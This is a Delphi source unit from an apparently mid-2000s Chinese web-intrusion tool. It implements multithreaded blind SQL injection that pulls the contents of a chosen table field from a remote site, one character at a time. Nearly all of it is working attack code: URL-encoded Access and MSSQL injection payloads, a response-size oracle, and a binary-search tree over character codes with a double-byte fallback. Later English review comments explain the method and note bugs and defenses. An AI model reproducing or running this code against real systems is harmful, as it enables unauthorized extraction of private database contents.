{##########################################
旁注入侵专用程序 3.0升级版
----------------------------------------
模块:SQL注入检测 - 检测字段内容
描述:该单元为检测字段内容的多线程单元
作者:2005.3.20日下午 明小子
更新:2005.4.14日凌晨更新
##########################################}
unit ScanContent;
interface
uses
Classes, GetHttpSize, SysUtils, StdCtrls, Windows, Dialogs;
type
{ Worker thread that recovers one character of a table field from a remote
  web application by boolean-based blind SQL injection, using the HTTP
  response size as the oracle (see Execute). One instance handles one
  character position (ForNum); results are written to MainForm.GuessLsv
  only through Synchronize. }
MyScanContent = class(TThread)
private
ContentInt, OutTextInt, OutTime: integer; // last Get_HttpSize result (presumably response size), matched char code, value passed to Get_HttpSize on every probe (presumably a timeout in ms)
ContentStr: string; // unused in this unit
ForNum, And1: integer; // 1-based character position; threshold: a result >= And1 counts as "condition true"
TableName, FieldName: string; // spliced into the probe URL without escaping
SqlUrl: TComboBox; // UI control whose Text is the base URL; read from the worker thread in Execute
Tmpcn1, Min, Max: integer; // Min/Max: search window of the double-byte branch (shadowed by nested-routine parameters); Tmpcn1 unused
TmpHanzi1, TmpHanzi2: byte; // high / low byte of a matched double-byte character
TmpN: integer; // unused in this unit
TmpID: string; // row selector used as TOP n in the probe
TmpBool: Boolean; // True: Jet/Access function syntax, False: T-SQL syntax (see SQLStr)
procedure UpDataStr; // Synchronize target: show a single-byte result
procedure hanzi; // Synchronize target: show a double-byte result
protected
procedure Execute; override;
public
constructor Create(Num, TmpAnd1: integer; URL: TComboBox; Table, Field: string; Bool: Boolean; ID: string);
end;
implementation
uses MainUnit;
{ Stores the scan parameters in the fields, lets the VCL free the object
  when Execute returns, and starts the thread unsuspended. Note that URL
  is kept as a TComboBox reference, not a copy of its text: Execute reads
  SqlUrl.Text later from the worker thread. }
constructor MyScanContent.Create(Num, TmpAnd1: integer; URL: TComboBox; Table, Field: string; Bool: Boolean; ID: string);
begin
// character position and the size threshold that marks a probe as "true"
ForNum := Num;
And1 := TmpAnd1;
// query target and row selector
SqlUrl := URL;
TableName := Table;
FieldName := Field;
TmpID := ID;
TmpBool := Bool;
// dispose of the thread object automatically once Execute has finished
FreeOnTerminate := True;
inherited Create(False);
end;
{ Synchronize target (runs on the main thread): writes the recovered
  single-byte character OutTextInt into the sub-item text of list row
  ForNum - 1 on the main form. }
procedure MyScanContent.UpDataStr;
begin
with MainForm.GuessLsv.Items[ForNum - 1] do
SubItems.Text := Chr(OutTextInt);
end;
{ Synchronize target (runs on the main thread): shows the recovered
  double-byte character, high byte TmpHanzi1 followed by low byte
  TmpHanzi2, in the sub-item text of list row ForNum - 1. }
procedure MyScanContent.hanzi;
var
Hi, Lo: char;
begin
Hi := char(TmpHanzi1);
Lo := char(TmpHanzi2);
with MainForm.GuessLsv.Items[ForNum - 1] do
SubItems.Text := Hi + Lo;
end;
{ Thread body. Recovers one character (position ForNum) of FieldName in
  TableName for the row selected by TmpID using boolean-based blind SQL
  injection: every probe appends a "between Min and Max" condition to
  SqlUrl.Text and treats Get_HttpSize >= And1 as "condition true", so the
  response size is the oracle. Values 30..130 are resolved through the
  fixed decision tree below, each path ending in a per-value ForProc
  sweep; otherwise the double-byte branch at the end runs. All UI updates
  go through Synchronize.
  Review notes: the outer try/except swallows every exception, so a
  network or UI failure silently ends the scan with no row update and no
  log entry. The burst of requests for one character differs only in the
  numeric range, which is the request pattern that server-side logging
  and WAF rules can flag; parameterized queries on the application side
  remove the oracle altogether. }
procedure MyScanContent.Execute;
{ Builds the probe URL for the range Min..Max (these parameters shadow the
  Min/Max fields). TmpBool = True produces Jet/Access function syntax
  (asc, mid, cstr, TOP n ... ORDER BY ... DESC); False produces T-SQL
  (unicode, substring, max(id) over TOP n). TableName, FieldName and TmpID
  are concatenated in without any escaping. }
function SQLStr(Min, Max: Integer): string;
begin
if TmpBool then
Result := SqlUrl.Text + '%20and%20(select%20top%20' + TmpID + '%20asc(mid(cstr(' + FieldName + '),' + IntToStr(ForNum) + ',1))%20from%20(Select%20Top%20' + TmpID + '%20[' + FieldName + ']%20from%20[' + TableName + ']%20where%201=1%20order%20by%20[' + FieldName + '])%20T%20Order%20by%20[' + FieldName + ']%20desc)%20between%20' + inttostr(Min) + '%20and%20' + inttostr(Max)
else
Result := SqlUrl.Text + '%20and%20exists(select%20*%20from%20' + TableName + '%20where%201=1%20and%20' + 'unicode(substring(' + FieldName + ',' + inttostr(ForNum) + ',1))%20between%20' + inttostr(Min) + '%20and%20' + inttostr(Max) + '%20and%20id=(Select%20max(id)%20From%20' + TableName + '%20where%20id%20in%20(select%20top%20' + TmpID + '%20id%20from%20' + TableName + '%20Order%20by%20id)))';
end;
{ Probes each value of Min..Max on its own (the parameters shadow the
  fields again); the first hit is stored in OutTextInt, shown through
  Synchronize, and the loop stops. Exit on Terminated leaves only
  ForProc, which is harmless because ForProc is the last call on every
  path of Execute. }
procedure ForProc(Min, Max: integer);
var
N: integer;
begin
for N := Min to Max do
begin
if Terminated then Exit;
// one request per candidate value; OutTime is handed to every request
ContentInt := Get_HttpSize(SQLStr(N, N), OutTime);
if ContentInt >= and1 then
begin
OutTextInt := N;
SynChronize(UpDataStr);
Break;
end;
end;
end;
var
TmpMin, TmpMax, N: integer; // N is unused here (ForProc has its own)
nmh, nml: byte; // high / low byte of the matched double-byte value
cn1: integer; //loop counter for the double-byte scan
cn2: word; //matched value reinterpreted as a 16-bit word
begin
try
OutTime := 60000; // passed to Get_HttpSize on every probe; presumably a timeout in ms - confirm in GetHttpSize
{***************************************************************
* If 30..130 is true, resolve the character within 30..130;     *
* otherwise go straight to the double-byte (Chinese) search.    *
****************************************************************}
ContentInt := Get_HttpSize(SQLStr(30, 130), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(30, 79), OutTime);
if ContentInt >= and1 then
begin
{If 30 to 79 is true, continue with 30 to 54, otherwise resolve within 80 to 130}
ContentInt := Get_HttpSize(SQLStr(30, 54), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(30, 42), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(30, 36), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(30, 32), OutTime);
if ContentInt >= and1 then
ForProc(30, 32)
else
ForProc(33, 36);
end
else {If 30 to 36 is false, the value is in 37 to 42; try 37 to 39 first}
begin
ContentInt := Get_HttpSize(SQLStr(37, 39), OutTime);
if ContentInt >= and1 then
ForProc(37, 39)
else
ForProc(40, 42);
end;
end
else {If 30 to 42 is false, the value is in 43 to 54; try 43 to 47 first, then 48 to 54}
begin
ContentInt := Get_HttpSize(SQLStr(43, 47), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(43, 45), OutTime);
if ContentInt >= and1 then
ForProc(43, 45)
else
ForProc(46, 47);
end
else {If 43 to 47 is false, the value is in 48 to 54; try 48 to 50 first}
begin
ContentInt := Get_HttpSize(SQLStr(48, 50), OutTime);
if ContentInt >= and1 then
ForProc(48, 50)
else
ForProc(51, 54);
end;
end;
end
else {Otherwise the value is in 55 to 79; try 55 to 67 first}
begin
ContentInt := Get_HttpSize(SQLStr(55, 67), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(55, 61), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(55, 58), OutTime);
if ContentInt >= and1 then
ForProc(55, 58)
else
ForProc(59, 61);
end
else {If 55 to 61 is false, the value is in 62 to 67; try 62 to 64 first}
begin
ContentInt := Get_HttpSize(SQLStr(62, 64), OutTime);
if ContentInt >= and1 then
ForProc(62, 64)
else
ForProc(65, 67);
end;
end
else {If 55 to 67 is false, the value is in 68 to 79; try 68 to 73 first}
begin
ContentInt := Get_HttpSize(SQLStr(68, 73), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(68, 70), OutTime);
if ContentInt >= and1 then
ForProc(68, 70)
else
ForProc(71, 73);
end
else {If 68 to 73 is false, the value is in 74 to 79; try 74 to 76 first}
begin
ContentInt := Get_HttpSize(SQLStr(74, 76), OutTime);
if ContentInt >= and1 then
ForProc(74, 76)
else
ForProc(77, 79);
end;
end;
end;
end
else {If 30 to 79 is false, resolve within 80 to 130; try 80 to 105 first}
begin
ContentInt := Get_HttpSize(SQLStr(80, 105), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(80, 92), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(80, 86), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(80, 82), OutTime);
if ContentInt >= and1 then
ForProc(80, 82)
else
ForProc(83, 86);
end
else {If 80 to 86 is false, resolve within 87 to 92; try 87 to 89 first}
begin
ContentInt := Get_HttpSize(SQLStr(87, 89), OutTime);
if ContentInt >= and1 then
ForProc(87, 89)
else
ForProc(90, 92);
end;
end
else {If 80 to 92 is false, resolve within 93 to 105; try 93 to 99 first}
begin
ContentInt := Get_HttpSize(SQLStr(93, 99), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(93, 95), OutTime);
if ContentInt >= and1 then
ForProc(93, 95)
else
ForProc(96, 99);
end
else {If 93 to 99 is false, resolve within 100 to 105; try 100 to 102 first}
begin
ContentInt := Get_HttpSize(SQLStr(100, 102), OutTime);
if ContentInt >= and1 then
ForProc(100, 102)
else
ForProc(103, 105);
end;
end;
end
else {If 80 to 105 is false, resolve within 106 to 130; try 106 to 118 first}
begin
ContentInt := Get_HttpSize(SQLStr(106, 118), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(106, 111), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(106, 108), OutTime);
if ContentInt >= and1 then
ForProc(106, 108)
else
ForProc(109, 111);
end
else {If 106 to 111 is false, resolve within 112 to 118; try 112 to 115 first}
begin
ContentInt := Get_HttpSize(SQLStr(112, 115), OutTime);
if ContentInt >= and1 then
ForProc(112, 115)
else
ForProc(116, 118);
end;
end
else {If 106 to 118 is false, resolve within 119 to 130; try 119 to 124 first}
begin
ContentInt := Get_HttpSize(SQLStr(119, 124), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(119, 121), OutTime);
if ContentInt >= and1 then
ForProc(119, 121)
else
ForProc(122, 124);
end
else {If 119 to 124 is false, resolve within 125 to 130; try 125 to 127 first}
begin
ContentInt := Get_HttpSize(SQLStr(125, 127), OutTime);
if ContentInt >= and1 then
ForProc(125, 127)
else
ForProc(128, 130);
end;
end;
end;
end;
end
else
begin
{* * * * * * * * * * * * * * * * * *
  Double-byte (Chinese) character search
* * * * * * * * * * * * * * * * * *}
{ The window bounds are negative and Max < Min throughout; presumably this
  matches what the server-side character function returns for double-byte
  text - not verifiable from this unit. }
Min := -10000;
Max := -15000;
{ Halves the window until it is at most 2 wide. Note the else branch does
  not bisect the current window: it moves the window below the previous
  Max (Min becomes old Max - 1), so a "false" answer walks the search
  further below the starting bound. }
while (Max - Min) < -2 do
begin
if Terminated then Exit;
ContentInt := Get_HttpSize(SQLStr(Min, Max), OutTime);
if ContentInt >= and1 then
begin
TmpMax := Max; {keep the previous Max}
Max := Trunc(((Max - Min) / 2)) + Min;
end
else
begin
TmpMin := Max; {keep the previous Max}
Max := Trunc(((Max - Min) / 2)) + Max;
Min := TmpMin + -1;
end;
end;
ContentInt := Get_HttpSize(SQLStr(Min, Max), OutTime); {check the final window once more}
if ContentInt < and1 then {no match: fall back to the last window that did match}
begin
// TmpMax is only assigned in the loop's "true" branch; if no probe ever
// matched, it is read here uninitialized.
Min := Max + -1;
Max := TmpMax;
end;
for cn1 := Max to Min do {Max < Min, so this walks the window upward}
begin
if Terminated then Exit; {exit if the thread was terminated}
ContentInt := Get_HttpSize(SQLStr(cn1, cn1), OutTime); {probe each value on its own}
if ContentInt >= and1 then {matched}
begin
// cn1 is negative: the integer-to-word assignment keeps the low 16 bits
// (two's complement); with range checking enabled it would raise instead.
cn2 := cn1;
asm
mov ax,cn2
mov nmh,ah
mov nml,al {high and low byte of the 16-bit value into nmh and nml}
end;
TmpHanzi1 := nmh; {hand over to the fields read by hanzi}
TmpHanzi2 := nml;
Synchronize(Hanzi); {update the UI on the main thread}
break;
end;
end;
end;
except
// Swallows everything (network and UI errors alike); the row stays empty
// and nothing is logged.
end;
end;
end.